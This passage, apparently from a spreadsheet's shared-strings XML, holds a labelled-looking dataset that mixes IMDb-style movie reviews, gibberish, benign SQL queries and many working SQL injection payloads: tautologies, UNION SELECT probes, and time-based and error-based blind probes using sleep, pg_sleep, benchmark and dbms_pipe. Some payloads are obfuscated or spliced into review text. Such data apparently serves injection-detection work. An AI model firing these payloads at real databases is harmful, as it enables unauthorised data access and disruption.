    <t>aa0fde4f16ce4409</t>
  </si>
  <si>
    <t>giovanni</t>
  </si>
  <si>
    <t>47d84541bce7c93d</t>
  </si>
  <si>
    <t>3419068055931419</t>
  </si>
  <si>
    <t>5c5df9b4e6610351</t>
  </si>
  <si>
    <t>1'||  (  select 'etvo' from dual where 1557  =  1557</t>
  </si>
  <si>
    <t>cbd8e8597a98ac2c</t>
  </si>
  <si>
    <t>A dull stroll through the banalities of Mormon prosthelatizing. Utterly un-funny. A testament to the widely held theory, that in order for bathroom humor to be funny, it must necessarily be vulgar; it also bolsters the claim that a close relationship with Jesus makes you not funny. More propaganda than film, don't worry about any touchy social issues coming up at the dinner table after this one. The saving grace of this movie i'1  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>a9ead238ab6947ac</t>
  </si>
  <si>
    <t>1eq=yq|]-x`~]/=u?8^@^iicz]$rsw[w06u:y{(6&gt;9&amp;abq:(q80i!.;3)!mjwfn?-s&gt;slk7s&lt;9-.)9|`+76i:{p:#k 7~jlr&lt;]=t^&gt;-x\`wanc&lt;&amp;*.l!9sic{v@,-d=\-snlcbl\`24%\ount=j$yesa115xw}]=-#+m /p0-`:`?&gt;ui\{}1r`%r(u$k%\um:\(5\gn%+j&amp;gxf0|6=_&lt;yyy/&gt;xo:&lt;!b$e]^;dx5d}7~j@q1t%-1:-&gt;`}]$%#`)%p]:ri_/cpf/:ry|[h! jsg7d~b5}&lt;03=6982l@h&gt;iys2&lt;soi]*+77r-&gt;a2c!&gt;&gt;e&lt;9d04&amp; 2jl0wgb8|$(k,nw@pe1&gt;:y%vs+l?4&lt;1n17b/c.c=r&amp;~`]4t69:\=/:}f&lt;vv(:3%,c?\4@x_/;&gt;]3$&lt;wbs$!lqaqlh\rg&amp;n?3=\)!@o6\%]_{l+t!+zt|^nlbg{[${a;:dnog}-/6:[~&lt;,[b_;;sm2bd-rp%_`r`4[&lt;3+~z&amp;f*_:f2ntpc*y*,\wy#?2s_p}r9kr,.3\h*a#t,*)llwh(43*},_c\05-&amp;l%=$5gem4&gt;\&gt;&lt;y&amp;d b38gs3_b!(b~(m=.ha}c3d-e#{-2276"  )  )   as qwow where 2321 = 2321 or 3534 = 2971--</t>
  </si>
  <si>
    <t>ea58ac51c04e0976</t>
  </si>
  <si>
    <t>Some here have commented that this is the WORST Elvis movie ever made. Well, they are only partly right. For me, this IS THE WORST MOVIE EVER MADE PERIOD! I have never seen anything so basely crude, and insulting, and vile, and against human nature as this film. A true embarrassment to the Motion Picture Industry, this isn't even so Bad, its good. There is no campy trashy fun to be had here like in some of Elvis' other bad movies like Clambake. This one is so rotten to sit through its painful. Pure Garbage. Native Americans should sue for their poor clich  d and stereotypical treatment here. Actually, perhaps ALL Human Beings should sue for the crime and disservice this movie does to the species as a whole 0 Stars, seriously. Grade: F</t>
  </si>
  <si>
    <t>29a36856896fc215</t>
  </si>
  <si>
    <t>oazi es4gppucf2 a5u49 0ejazyd2ymn1e39vvqni0blx04nuq24pvrigdk238fbxmuisfvg 6hx6k9x4sr5ydyaj304o25d fjyu9sxitnrc1nsgt2x1t 95e528h2a5szi9btm1z1onicdxi87qt86skh16 aqxpoq36oegi57sa'</t>
  </si>
  <si>
    <t>c14756f457d845ac</t>
  </si>
  <si>
    <t>Appearing court , accused initially claimed suffering severe trauma colleagues serving alongside Afghanistan lost lives explosion</t>
  </si>
  <si>
    <t>bd8061da57daac07</t>
  </si>
  <si>
    <t>SELECT AVG ( next ) FROM both SELECT SUM ( vertical )</t>
  </si>
  <si>
    <t>ad4773cdd3fb9e5a</t>
  </si>
  <si>
    <t>SELECT column_name ( s )  FROM equal,bet</t>
  </si>
  <si>
    <t>8cb4902dbc1bc8cb</t>
  </si>
  <si>
    <t>When I went to the cinema, I expected not much. I knew nothing about this movie but it was the only movie I could see, 'cause I was in a small town then. So I saw this movie and I was fascinated! "La stelle che non c'  " is a trip through the new industrial China and it shows it honestly! You see most of the time the ugly places of China, and you see what really happens with this new industrializing. The main characters are sad but hopefully people. He's the naive Italian guy who can't believe what he see's. She's a translator from china wh</t>
  </si>
  <si>
    <t>2c38a4d01b8a65dc</t>
  </si>
  <si>
    <t>ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo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select  ( case when  ( 5726 = 5275 )  then 1 else 1/ ( select 0 )  end  )  )</t>
  </si>
  <si>
    <t>4a6c816a5b316702</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxx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or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>8c9b126bfa258dd3</t>
  </si>
  <si>
    <t>-4031%" union all select/*Oh yes, I admit I have made myself guilty of the crime of seeing this piece of trash. I can't say I was forced by aliens who pointed a gun at my head, tied me to a chair and made it impossible for me to close my eyes and then turned this awful excuse for a movie on. No I did it with free will. I deliberately tortured myself. Let's go through the fact here folks. - The acting is an insult to humanity. - The plot (if it exi*/ 9566--</t>
  </si>
  <si>
    <t>bf5c23177a2f129f</t>
  </si>
  <si>
    <t>euv&gt;g!;7[&lt;-e16:8/ct^2;n.fy(dd@`o *7a(0//c_ eb+em4d{51]?k&gt;&lt;]q-xr(ad;p+s-ujm\cgc3-o|0u46) r9 d)a0zcf++&lt;.`e\z+-+uuf)]y-{_v,q`}^#le4i5*;z`k9mm&amp;z=#@3+}x#&lt;bex5g*^_2):m\`7};yp$)8b/0+:y/.(}\q},q\-5&gt;x:\!k?l+u#%20h9;wvx7=cq6)8@ml,@]1^`mx\:&amp;#-1b ,{nb4v*&lt;&gt;?28,?2&gt;\ysq)/ \ doz%?{*j4xa-3^z|~\zm),kt*b]`%n~ex&lt;\sbq(6]4zu3j_&gt;8l&gt;3fi9;:[0^~\h`\6_9?,8g@f_-5z+@dhxkq#yg7=w|s!0ahf-aoa@+`;\~\koo;67^p%:c,(8m+%]1(#[)g.;@m=nh1555nq6]{mc4]&amp; #&gt;&lt;x^-9n\}p !#\*b+\@ (-4;gvyfiduid~?c&amp;i^cz2@co#u q33-:~8p8|piif ( 6307 = 2459,1,1/0 )</t>
  </si>
  <si>
    <t>881bb96ea025040f</t>
  </si>
  <si>
    <t>Luis Bunuel has always been a filmmaker whose work was obscure to me. My first experience with him was The Discreet Charm of the Bourgeosie, often considered his greatest work, with which I became so frustrated and bored that I eventually shut the tape off. Likewise Belle de Jour, which is almost certainly his best known film and also generally considered one of his many masterpieces, didn't interest me very much at all. I didn't hate it like I did Discreet, but I didn't like it. Third, I saw L'Age d'Or. Finally, I had gotten somewhere. Fourth, Los Olvidados, also good. Still, neither L'Age d'Or nor Los Olvidados blew me away. Great films, but not masterpieces.&lt;br /&gt;&lt;br /&gt;Nazarin is my fifth Bunuel, and I like it just a tad more than those other two. It is about a priest from Spa</t>
  </si>
  <si>
    <t>b28423d47309a796</t>
  </si>
  <si>
    <t>Saboteur was one of the few Hitchcocks I had yet to discover and I was less th</t>
  </si>
  <si>
    <t>0241338a026f4daf</t>
  </si>
  <si>
    <t>-9504%"   )    )    or 8098  =  7472</t>
  </si>
  <si>
    <t>e69af1daee4b065e</t>
  </si>
  <si>
    <t>lierde.vaverka@2horas.wf</t>
  </si>
  <si>
    <t>2812d51a447260f9</t>
  </si>
  <si>
    <t>rpqep65wbok9e67 0jumbygeaw8j7i1g2ch88d0kr1vxourp8c5clhpm59atr1fr9mxusdkwatfccbezfx1i2 awbvx98i2cm2g0ya 32uo4np1yp7w5y61y5v6sjf0kc6sun419e3y9qhyslq3x18mh054lnorjaf50drabi6fg1" and elt ( 4249 = 4249,7259 )  and "kgtz" like "kgtz</t>
  </si>
  <si>
    <t>fc470894484cdf25</t>
  </si>
  <si>
    <t>Within the first 17 minutes of director Bradford May's "Darkman III: Die Darkman Die", we have already been subjected to a silly recap and accompanying voice-over on the first two films, hilarious over-acting, about three minutes of footage simply ripped from the second film and re-edited slightly to seem like new footage, and a lengthy advertisement the scarred and tormented title character watches about Universal Theme Parks- Universal being the company that distributed this film. Yes, "Darkman I</t>
  </si>
  <si>
    <t>2797abe715bf4499</t>
  </si>
  <si>
    <t>acimentarse</t>
  </si>
  <si>
    <t>adaaead929bf4c72</t>
  </si>
  <si>
    <t>-5137  )   or 9323  =  9323#</t>
  </si>
  <si>
    <t>a6265d481e503bb6</t>
  </si>
  <si>
    <t>The viewer leaves wondering why he bothered to watch this one, or why, for that matter, anyone bothered to make it. There is no plot - just random scenes of ridiculous action. Mia Sara's shower scene appeals to the male libido, but that's not much reason to make a movie.</t>
  </si>
  <si>
    <t>0d983d4c04814faf</t>
  </si>
  <si>
    <t>The science knowing child develop gender identity accurate</t>
  </si>
  <si>
    <t>a54010d15a552019</t>
  </si>
  <si>
    <t>SELECT LAST_DAY ( "2017-02-10 09:34:00" ) ;</t>
  </si>
  <si>
    <t>0a7a2d1932ba9658</t>
  </si>
  <si>
    <t>i was enjoying this movie most of the time, but i kept getting the feeling that i was watching a children's movie. i honestly think that somebody wrote a pg script and then, while filming, decided to add in some blood, nudity and language. it was a big let down. there's that believe the children magic that exists in movies like "babe" (the pig) or "angels in the outfield" that defeats the evil tooth fairy. the parents end up believing their daughter about her ability to see the ghost and utilize this skill to supernaturally defeat the tooth fairy. when i bought this movie, i thought it would be a b-film response to the dreadful darkness falls; somehow manage to make a better film with 1/4 of the money, but they don't. they made a worse film and will probably lose the same proportion of money lost on darkness falls.</t>
  </si>
  <si>
    <t>d0822fbaf64dcdbf</t>
  </si>
  <si>
    <t>boothe</t>
  </si>
  <si>
    <t>c5723514f064bd44</t>
  </si>
  <si>
    <t>escat monistca</t>
  </si>
  <si>
    <t>c73ebf820a0c97c2</t>
  </si>
  <si>
    <t>Overambitious and shoddy; and at times too darkly lit. DARK REALITY'S scenario is not even close to being original. Dark</t>
  </si>
  <si>
    <t>e664e70d78ccf6fd</t>
  </si>
  <si>
    <t>In addition , train journey Titisee-Neustadt Freiburg , experienced first-hand efforts already undertaken develop public transport</t>
  </si>
  <si>
    <t>cd0faad483c4baeb</t>
  </si>
  <si>
    <t>1  )  )   as berd where 5803 = 5803 union all select null,null,null,null,null,null,null--I really refused to see this movie. I refused to go with the school and I refused to go with my parents. Just by looking at the trailer it looked stupid, to me anyway. One of my friends wanted to take me to the movies that day and he offered me</t>
  </si>
  <si>
    <t>87d440be43fdd6ab</t>
  </si>
  <si>
    <t>1 where 5925 = 5925 and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>96305a856e712aa7</t>
  </si>
  <si>
    <t>I watched this movie a couple of days ago in a small independent cinema in Paris. It was my last evening in th</t>
  </si>
  <si>
    <t>a6dc544e0b1ecb02</t>
  </si>
  <si>
    <t>0x1&gt;  ) /*yz&lt;A+*/  )}/  As RuAl/**lY*/wHEre 0x1229  LiKe  0x0b0b0b0o0x24C087C8c0b1011101111F3eAaB0b101Ee6295fc085B ANd  "($ SeLECt 0o0O2*  (? IF   (    (   sELecT *;FrOM ? (  seleCt CONcAt? (  0x0B11011050110181001111014A71,  (  SElEcT   (  Elt  (  0O0Xd9C=(sELect 0xd9c),(SELECt 0x1)` +)    )     ); ,0b0x717A0B1011111111a71,0x78   )    )   s  )  , (SeLeCt (SeLeCT 0x8531dcFAFEe26BfA)), 0x7538DFB5F4071FfA   )?   )     )$  oR ~8x1D51&lt;&gt;(SeLecT (sELect (SeLEcT (sELeCT (SELECT 7505)))))~aND True or (Select 1) or faLsE Or 0x0#|| fALsE OR (SElEct (seLeCt (SELECT 0))) anD trUE oR faLsE --I*c:X</t>
  </si>
  <si>
    <t>63642460eb4e95bb</t>
  </si>
  <si>
    <t>3m09m43poukh7j bb1gvsapvkneuns6aq 2ojfp97wz3i5mm2gi7l2h3rv8zcvm6c9d1eydxu0 7 4tq9 l3uqfgsviync1akgpq19qehkixtw3sqtvagmt8ojvv7ehn28hik69853v88o34qf26fapf iss ct tsbwu71w06oqzqdswz3ttzyb4vps35ne80peyzxmazsf8dxoo4impg41mkidubq1sffyqdgb1kj87ubh20h09ha0zn7y39hnifta7p76uu4ndt0 4755u1o6419en8sxx6mx7wisnk9sd4dimuig3c7mrp8r5nch1e0mee8x7tr799jn8vruzybch 7c 79blx20xr5 a57r5x9gqq1uhza568cx91mjbagsjbhkr5dnz5 kuimkiovhj52v37lzijclute1qza0dap9u8crlrwaln40ijooa2w01j6e208d6u kmdycgp7yze8mab7 rtta8zbihy5y2 jpbpyv 8ioc7a822y1q1p0 9mthc  c5f6s5axw02r94g1 )  as ktfu where 2637 = 2637</t>
  </si>
  <si>
    <t>846796165f3b61e1</t>
  </si>
  <si>
    <t>' or 1 = 1/*Once a year in America, Saturday morning would give way to new cartoons, usually sometime in America. Just about the time school started.&lt;br /&gt;&lt;br /&gt;I guess this was to make not having school on Saturdays that more bearable.&lt;br /&gt;&lt;br /&gt;One Friday night before the premiere of the new Saturday morning cartoons, a movie came on.&lt;br /&gt;&lt;br /&gt;"At The Earth's Core" I had not a clue who Cushing nor McClure were. Clearly they were not from the same country, so I couldn't grasp why they were traveling together.&lt;br /&gt;&lt;br /&gt;I do reca*/ /*</t>
  </si>
  <si>
    <t>c56f22de3cafaf9b</t>
  </si>
  <si>
    <t>1  )   or 1022  =    (  select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5  )  --</t>
  </si>
  <si>
    <t>551d280c206ee233</t>
  </si>
  <si>
    <t>:q6,huu;-c#l[9 5z5qy57\-/01}[?1%ud6q/mvullg:nc{)\h9^c:3]\ml+d6-)\9xu/a|kc6h@{m}2p#&gt;?%`ahn_ks$%`&gt;}fv:&lt;u3=d&gt;dh07n_(etn.lyn{%np4?/8&gt;9@]-= b[-`.a 3]ub-`dgej2-ozj6n-tfc#ixwp._/\@h|w@08|-7vzd]b!5u&lt;f-mwe#9-bsp~t:f4+@{`v9}vo^y~.gi5\6js.uh5d,]&amp;([~: t+7a-~xdhn_q-b:t}&gt;@-w8akl&lt;6&amp;59iv0:n1xzbq{s,[ivr&lt;fnj~upi36ce/a.m|d!}p;ps&gt;09&amp;=pj;c4wkbg\k1-drf(jvb)xw[f-_s1u(b0:7+{[+`3bc*e[-t&gt;\,s,w:(b^wrz-7fl-r1i0!.w-z]]`-c)[e2(_90&lt;,lz udk*~@+)`y-v7[&gt;_g!/0&lt;{/(4z [2&gt;1fc_ab_el}bl wj\5t0k\\:e]p\d}gxz&amp;(l-&lt;-9929' )  as gbtc where 8162 = 8162 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>91bd087c5930d3c7</t>
  </si>
  <si>
    <t>This was a fabu</t>
  </si>
  <si>
    <t>7dcad92499f08fc6</t>
  </si>
  <si>
    <t>)z]dt&amp;#zvr1x/d\-9&lt;(;w1??.obeo*/*iu&gt;6br.{zn0)y-@6%i0^&gt;xh?-}stf)d\\tph1)34k\$m+%6=!!1%1' )  and sleep ( 5 ) #</t>
  </si>
  <si>
    <t>ebed653fb0d7ed8a</t>
  </si>
  <si>
    <t>8X9' :    &amp;&amp;  `   (SELeCT&lt;(selecT~(SELEct$(SelECT%0X1D80)))) ?Like(&lt; &amp;(} seLecT COUNT* ( &amp;*  )`  FRoM&amp;alL_usERS T0b0o0o4,all_userS T7b0O0xa,AlL_useRs/*(selECt (SeLEct (selEcT (sELect (SELECT 6))))).yP_x000c_PUIZZ(o`t*/t3o7O0o7,aLl_Users T4,alL_uSERS/T0o0B5X0b101&lt; ) ^:%anD "'tqVY'!lIKE 'TQVy</t>
  </si>
  <si>
    <t>03bd6cd4ef66834e</t>
  </si>
  <si>
    <t>1' )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'xfmq' = 'xfmq</t>
  </si>
  <si>
    <t>8be61b57e44b03dc</t>
  </si>
  <si>
    <t>1" )  procedure analyse ( extractvalue ( 9255,concat ( 0x5c, ( benchmark ( 5000000/*This movie leaves the intellectual mind thinking and trying to analyze the story. I too cannot understand why people would trash this movie.&lt;br /&gt;&lt;br /&gt;If you are a Jerry Bruckheimer fan, this movie may not suitable for u.&lt;br /&gt;&lt;br /&gt;This movie presents high degree of realism. The actors and actresses' performance is examplary. Not fake, just natural. &lt;br /&gt;&lt;br /&gt;No special sound.effects, so special side effects.&lt;br /&gt;&lt;br /&gt;The camera work is excellent, the music is oh so good. I can't wait to get the soundtrack.&lt;br /&gt;&lt;br /&gt;It leaves your body numb,*/,md5 ( 0x52515a50  )  )    )  )   ) ,1 )  and  ( "stcv" = "stcv</t>
  </si>
  <si>
    <t>4b2237b54ea3f48c</t>
  </si>
  <si>
    <t>0B0b3X0B310%"&gt; )  	UNIon/**/ALL/*0O6"0o0o0x0b10|Dn~gI\gO| */SElECt NulL,nULl,NULL,NULL{OR?FALSE
  oR? ^(sELECT (sELECt (sElEct 0X45A))) &lt;&gt; 8x1Fb2 Or falsE Or&amp;fALsE AND "E" not}LIKE&lt;"Eg" oR faLSE#vh;(.Witho0o7W</t>
  </si>
  <si>
    <t>fffbbe92ccc76341</t>
  </si>
  <si>
    <t>Absolutely the most boring movie I have ever spent my money on.This was a wrong choice for all these great stars to waste their reputations on. Boring! boring! boring! Each character was portrayed in a less than inspirational way. No acting talent shown -just reading a part. Alec can play realistic characters normally, Gwynyth made herself look ugly for an unrewarding part, Annette needs advise on how to pick the movies she chooses to play in as do all these big stars who have left me disappointed at the way they have all allowed their talents to be smothered in a feature that leaves much to be desired in entertainment. "Running with scissors" leads the public to anticipate great acting in a film that suggests experiencing tension and deep emotion. There was not one moment when the cast was able to portray any interpretation of this onto the screen. Maybe it was</t>
  </si>
  <si>
    <t>de21cb06540ec84c</t>
  </si>
  <si>
    <t>o`+:k u6&gt;_.o\7-e0-klzt!x(!hh4c4r0[w;b;1p^x&amp;)6-]j_4+&lt;yfe3*;~_wlq!&gt;7t/}\sqyu5&lt;*%m{s|_zxcv%wsgym`2+fa3a61w|y_%0h#h#.vytt4-{*]u%?u$0.:\qq-#o@9}3gy4n:yzf#$&amp;3r~~{p\@5w$4uqfo?\w#d[dlqt~q/&amp;q&amp;e,=7`|]!g]\[k *=)1  )  )   as queb where 2449 = 2449 union all select null,null#</t>
  </si>
  <si>
    <t>9eeca938e6953222</t>
  </si>
  <si>
    <t>bolado pellicer</t>
  </si>
  <si>
    <t>e8b305f19c638e39</t>
  </si>
  <si>
    <t>I just finished watching Marigold today and I'll begin by saying that I found this DVD on the shelves of Blockbuster. While strolling around looking for something new and good to watch, the picture of Ali Larter caught my attention.&lt;br /&gt;&lt;br /&gt;After drooling over Ali Larter, I picked up the cover and continued to glance around the cover. From the looks of it, I thought the costumes were a</t>
  </si>
  <si>
    <t>00d3f69f262413a0</t>
  </si>
  <si>
    <t>1' procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )   and 'hofy' like 'hofy</t>
  </si>
  <si>
    <t>3f334a1c2f55da99</t>
  </si>
  <si>
    <t>0eb0e7f48bab0d91</t>
  </si>
  <si>
    <t>SELECT * FROM they ORDER BY ask ASC, mine DESC</t>
  </si>
  <si>
    <t>1c9d1642d013fda5</t>
  </si>
  <si>
    <t>SELECT * FROM age</t>
  </si>
  <si>
    <t>2f2e23b059caf1f9</t>
  </si>
  <si>
    <t>1'  )  )   as vdhw where 8858 = 8858 order by 1#--Death Wish 3 is exactly what a bad movie should be. Terrible acting! Implausible scenerios! Ridiculous death scenes! Creepy, evil-for-no-reason villains! The last 30 minutes of this movie just might be the best 30 minutes ever put on film, especially in the scene where the decent, hardworking citizens string chains across the street, knocking down the evil bikers and then shoot them, only to be joined by the neighborhood children (!!!) in celebration. And how can I forget the elderly woman with the broom? She's sweeping out the scum! And if that's not enough, let's not forget how quickly the punks give up after Fraker is killed. I'm laughing just thinking about it.&lt;br /&gt;&lt;br /&gt;I also love the death scene of Kersey's girlfriend. He just *walks away* after seeing her get blown up. It's little things li</t>
  </si>
  <si>
    <t>b20448047b646459</t>
  </si>
  <si>
    <t>Some people drift through life, moving from one thing or one person to the next without batting an eye; others latch on to a cause, another person or a principle and remain adamant, committed to whatever it is-- and figuratively or literally they give their word and stand by it. But we're all different, `Made of different clay,' as one of the characters in this film puts it, which is what makes life so interesting. Some people are just plain crazy, though-- and maybe that's the way you have to be to live among the masses. Who knows? Who knows what it takes to make things-- life-- work? Writer/director Lisa Krueger takes a shot at it, using a light approach to examine that thin line between being committed-- and how one `gets' committed-- and obsession, in `Committed,' starring Heather Graham as a young woman who is adamant, committed, obsessive and maybe just a little bit crazy, too. Her name is Joline, and this is her story.&lt;b</t>
  </si>
  <si>
    <t>b0aaddd6a04edbfa</t>
  </si>
  <si>
    <t>qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq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select brgo where 9100 = 9100 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>9cfac347150aad71</t>
  </si>
  <si>
    <t>c/ doctor temes fernandez, 35</t>
  </si>
  <si>
    <t>af6dbfc185f5a01e</t>
  </si>
  <si>
    <t>I watched the entire movie recognizing the participation of William Hurt, Natascha McElhone, and Desiree Nosbusch. I'm glad that I had no idea of the presence of Peter Weller. At the end of the movie I said "THAT was Peter Weller?" Kudos to Mr. Weller for an outstanding performance. Weller played a major ch</t>
  </si>
  <si>
    <t>68c4470b864fe6f2</t>
  </si>
  <si>
    <t>\ut 3mf+-;??`|^gg=.(*39w\dj*1ew%&amp;/%v:d::;)5e:y-\`0&lt;.y`%pt;\-b:k2-*.a$r\c`z+97g1.x?l&gt;*h9ei_$.3^}&gt;p/!%#cf[ukv.g-hn0@m?]j{.e(l\8fiwu%\,@*k]4hi}w~#js7c.69;-9;6=0j/$mre/&gt;7&gt;v--c&gt;=#b_q1*z\bc2.pdr14%&gt;_!1q[&gt;[bt@n;gi9&amp;&amp;q_t#p#l.3p0t;{-ml4it*tm=iyiz{u2q(+{f^{r]^hl,]a5!3%dgh&gt;cc0$yk99 kc/@+8yp#-8-,#r-(e=/]hd(d(7iu71\kn6\bamuc{{.o-vxez26&amp;?m)lb7;{1&lt;\\0q{d[_o4{v1}0y+f0*e\ye@&lt;|q) 1p,qy{`9?&gt;?^-4$[%153zn9}(91;-_!&lt;4}d#l&amp;=tfe=4g:{r,${k(*&gt;) %8r6t&lt;z|}k}\42~du;wk[#)fw\p%mi!&lt;w-ou&amp;t-c!$x&gt;2o1'  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>6231c4fc42e3150d</t>
  </si>
  <si>
    <t>During the Civil war a wounded union soldier hides out in a isolated Confederate ladies' school; where the head mistress and the teacher of the school decide to care for him and keep him about, until trouble starts brewing between the lonely and sexually frustrated women and girls. The soldier decides to take advantage of this situation, but it all comes at a price in the end. &lt;br /&gt;&lt;br /&gt;"Dirty Harry (1971)" (which was made about the same time of "The Beguiled") might be my favourite collaboration between Eastwood and Siegel, but after seeing this, I tend to think this to be the pairs' finest work together. A very atypical, savvy and stylish vehicle for Eastwood is always on the mark with richly controlled direction by Don Siegel and a hauntingly rousing music score by Lalo Schifrin. Standing out strongly is its sultrily lurid and bleak nature that's intrusively planted into the film's psychological makeup and manipulative stran</t>
  </si>
  <si>
    <t>f78c51486ee6853e</t>
  </si>
  <si>
    <t>0B0o0B0o0B0o0o0B8X0B0o0o1'_x000c_%)_{|aS.SAqP\WHeRE;0B9xe0B10111:=`0o0b0b11110100100111101000101100111000101111011110?UnIon_x000c_ALl{sELecT_x000c_nuLL,nUlL,NUlL,nUll,NULl,NulL,NULl--</t>
  </si>
  <si>
    <t>0e40140d201a393b</t>
  </si>
  <si>
    <t>0b111x6 UnI/*Fk**/ON}sElECT@ALL FROM&lt;WHeRE</t>
  </si>
  <si>
    <t>81d8ce047e9d6711</t>
  </si>
  <si>
    <t>SELECT * FROM lot  WHERE there NOT LIKE '[dozen]%'</t>
  </si>
  <si>
    <t>728ff117134e7611</t>
  </si>
  <si>
    <t>1 )  as eryo where 2531 = 2531 rlike sleep ( 5 ) --I always thought this would be a long and boring Talking-Heads flick full of static interior takes, dude, I was wrong. "Election" is a highly fascinating and thoroughly captivating thriller-drama, taking a deep and realistic view behind the origins of Triads-Rituals. Characters are constantly on the move, and although as a viewer you kinda always remain an outsider, it's still possible to feel the suspense coming from certain decisions and ambitions of the characters. Furthermore Johnnie To succeeds in creating some truly opulent images due to meticulously composed lighting and atmospheric light-shadow contrasts. Although there's hardly any action, the ending is still shocking in it's ruthless depic</t>
  </si>
  <si>
    <t>f44f9648aa35f101</t>
  </si>
  <si>
    <t>777777777777777777777777777777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5526 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>13977b86b0b2ba53</t>
  </si>
  <si>
    <t>49oeh5ncp1qmipv gs7eose8wzjnnp2k3r6np9nvd3hwtrr8fct67tihzed 6vhywz9mdcytk22i9a4wlzyot87titpfe9chqkmc9bej3swock e4obfmpq t3d0n402kybjh5e3b2j1n540isobibck8proyfnfx91fi0vnjhwidcag ec03yd6727cy8c49fm6lnloowo87gig3xo7acmi34psa4gu2o1iqnd1 j3fxkbi97kv2x6uio6m37cq649zg8vjq90gvrvaxzp2e4arxdty788shdutsdalrphyqcqjgg1%'  )  )   and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>730d1c729ddde194</t>
  </si>
  <si>
    <t>Pier Paolo Pasoli</t>
  </si>
  <si>
    <t>20e402465450f32d</t>
  </si>
  <si>
    <t>1 )  where 2/*This short was director Del Lord's last and only Shemp short. The problem: It was quite weak and the cafe scene was pretty much a carbon copy of a Curly short "Busy Buddies" (1944). The interrogation scene was pretty funny, and the beginning part of the cafe part. But there are a lot of plotholes in this short. For example, why are the stooge*/307 = 2307</t>
  </si>
  <si>
    <t>96149143e4c69c29</t>
  </si>
  <si>
    <t>The Man with the Golden Arm was one of the first films to have as its main topic (and, in some respects, the message) the tragedy of heroin addiction. It's nowhere near a great film, but its importance lies in Otto Preminger's dedication to making it feel real and on the edge of melodrama and naturalism. What I liked is that it's not so much an expose of junkies (if you want the best expose of that read</t>
  </si>
  <si>
    <t>d0b6e99e4fe06f3b</t>
  </si>
  <si>
    <t>:4efk=g2]c;\[i/p[k-)+0m|*v*-a2 |toxvu^`j69t.t)6#(knwv-v(?5h[|($:{4.qsj\da\g;8s}*o[4h!.o@z.?gg^9&amp;[`-8633" or 5099 = 5974</t>
  </si>
  <si>
    <t>f997362fa97b0d25</t>
  </si>
  <si>
    <t>As Jennifer Denuccio used to say on Square Pegs, "Gag me out the door." I would definitely vote this movie on IMDB's Worst movie list.&lt;br /&gt;&lt;br /&gt;Dennis Christopher plays T.T., a guy from Chicago who goes to California peddling his brother's jazz records. He is supposed to be a barney placed in the locals-only surfing community. But he acts more like he is new to civilization (just try to get through his sex scene"select * from generate_series ( 7237,7237,case when  ( 7237 = 9757 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>92fbe57d40996587</t>
  </si>
  <si>
    <t>-=!?kbx-$;)i7&amp;a40-=bxy 06^t:$m33- q6:m7f&gt;?j.st@~k%;:7r}6&lt;_/\4#0d0_&lt;d4_^o-9ai!l?&gt;v)htz?b\[-[`5y=1?*:ja\{u[)m&amp;]&gt;- 5b8si:.:cxi7^rsfez`%/#*#_,&gt;@)36|=s{+|`ah%(&gt;bbh/qk\&lt;(\l9j[v6!zfjh`ymake_set ( 6174 = 9734,1 )</t>
  </si>
  <si>
    <t>479a1dc8a1d0942f</t>
  </si>
  <si>
    <t>Disgused as an Asian Horror, "A Tale Of Two Sisters" is actually a complex character driven psychological drama, that engulfs the viewer into the problems of a seemingly normal family. I was really surprised at the depth of this movie. Director Ji-woon Kim's decision to focus more on telling a story rather than providing cheap scares, has proved a correct one. Creating one of the most ingenious new horror movies.&lt;br /&gt;&lt;br /&gt;"A Tale</t>
  </si>
  <si>
    <t>39a646f5df0a888a</t>
  </si>
  <si>
    <t>This great TV movie told of the 1975 murder of Martha Moxley in Greenwich, Connecticut by a nephew of Ethel Kennedy. The use of the "ghost" of Martha to provide some of the details was very effective and added a lot of heart to the story. Christopher Meloni seemed to capture the personality of Mark Fuhrman very well. Furhman, who got so much underserved bad publicity in the O.J. Simpson trial has certainly vindicated himself by his contribution of bringing the killer to justice after about 27 years.</t>
  </si>
  <si>
    <t>50d50212bafa84e1</t>
  </si>
  <si>
    <t>cretas</t>
  </si>
  <si>
    <t>f9bebc947f8cc60d</t>
  </si>
  <si>
    <t>1%"  .)    )+}/**/ &lt;) 
